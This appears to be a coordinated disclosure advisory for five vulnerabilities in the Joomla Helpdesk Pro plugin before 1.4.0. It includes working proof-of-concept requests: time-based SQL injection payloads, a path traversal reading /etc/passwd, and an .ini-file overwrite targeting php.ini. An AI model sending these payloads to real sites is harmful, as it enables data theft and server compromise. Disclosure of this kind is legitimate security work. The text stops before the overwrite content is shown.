Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities

2015-07-21 09:05:52

Document Title
Joomla! plugin Helpdesk Pro < 1.4.0

Reported By
Simon Rawet from Outpost24
Kristian Varnai from Outpost24
Gregor Mynarsky from Outpost24

For full details, see;

Tested on
All exploits were tested and verified by Outpost24 for HelpDesk Pro version 1.3.0. While no official testing has been done on earlier versions, all versions prior to 1.4.0, where the issues were finally patched, are suspected of being vulnerable.

Release Date

CVE-2015-4071 CVSS: 4.0 Direct Object References
CVE-2015-4072 CVSS: 6.5 Multiple XSS
CVE-2015-4073 CVSS: 7.8 SQL Injection
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal
CVE-2015-4075 CVSS: 6.8 File Upload

Vulnerability Disclosure Timeline:
2015-05-23: Vulnerabilities discovered and reported to mitre
2015-05-25: Vendor contacted
2015-06-21: Vendor released update version: 1.4.0
2015-07-16: Public disclosure


Direct object references CVE-2015-4071.
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}

It's possible to read other users' support tickets by changing the numeric id.

XSS CVE-2015-4072.
Mostly authenticated dependent on site configuration
Output validation is universally overlooked
Example: Name and message
Path: http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1

SQLi CVE-2015-4073 for both SQLi.

There are 3 SQLi:

Vulnerable parameter: filter_order
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets
Post data: search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC

Vulnerable parameter: ticket_code
Path: http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23

Vulnerable parameter: email
Path: http://{url}/index.php?option=com_helpdeskpro&
Post data: name=asdf&[email protected]"%20and%20sleep(5)%20and%20"3"="3

Local file disclosure/Path traversal CVE-2015-4074.
Path: https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe

File Upload CVE-2015-4075.
Path: http://{url}/index.php?option=com_helpdeskpro&
Injected parameter: item, keys, attacker specified
Post data: lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;
Description: Allows for .ini files to be created wherever the web server has write access. If the .ini file already exists and is writable, it will be overwritten by the server. In a poorly configured system, this will allow for code execution by including applicable arguments in .ini files. This however is not applicable to most systems. Any non-protected .ini files will be possible to replace, with impact depending per file. This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:


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